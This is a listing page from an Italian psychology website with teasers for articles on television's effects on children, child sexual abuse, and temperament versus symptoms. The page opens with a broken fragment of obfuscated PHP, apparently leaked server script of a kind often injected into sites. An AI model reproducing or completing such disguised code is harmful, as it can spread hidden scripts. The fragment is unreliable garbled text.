=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) Bambini

Area Riservata



Ti ricordiamo che per rendere attivo il tuo account dopo la registrazione, sarà necessario aprire il messaggio email che riceverai e cliccare sul link di attivazione.

  

Bambini

Gli effetti negativi della TV sui bambini PDF 

3 gennaio 2006 - a cura di Valentina Ungaro, Psicologa 

 

La diffusione della televisione ha gradualmente trasformato le abitudini di molte persone.
Questo strumento d’informazione di massa si è guadagnato un posto di primo piano tra le attività quotidiane, uno spazio che qualche volta finisce per trasformare l’uso in abuso da parte di chi ne usufruisce per intere giornate, lasciando poco spazio ad un atteggiamento critico di fronte ai contenuti ricevuti. 

Leggi tutto...
 
L'abuso sessuale PDF 

10 febbraio 2009 - a cura di Daniela Fierro, Psicologa

 

Non esiste una definizione universalmente accettata di abuso sessuale sui minori, tuttavia lo si può definire come “il coinvolgimento di bambini ed adolescenti - soggetti immaturi e dipendenti - in attività sessuali che essi non comprendono ancora completamente e alle quali non sono in grado di acconsentire con totale consapevolezza”. La caratteristica centrale di ogni abuso è la posizione dominante dell’adulto che induce, in maniera coercitiva o tramite l’utilizzo della forza, un minore ad un’attività sessuale.

Leggi tutto...
 
Sintomo o temperamento? PDF 

8 novembre 2004 - Mentesana

 

I problemi comportamentali dei bambini: sintomi psichiatrici o tratti del temperamento?L’approccio diagnostico proposto dall’autore in questo articolo è strettamente legato al concetto di “differenze individuali” e alla consapevolezza che ogni bambino è diverso da tutti gli altri. Anche se alcune differenze individuali sono state classificate ed etichettate come disturbi mentali (vedi le classificazioni internazionali dell’ICI-10 e del DSM), l’autore sottolinea che “diverso” non necessariamente significa “anormale”.

Leggi tutto...
 
<< Inizio < Prec. 1 2 3 4 Next > Fine >>

Pagina 4 di 4

Per migliorare la tua navigazione su questo sito, utilizziamo cookies ed altre tecnologie che ci permettono di riconoscerti. Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy.

Acconsento all'utilizzo dei cookies su questo sito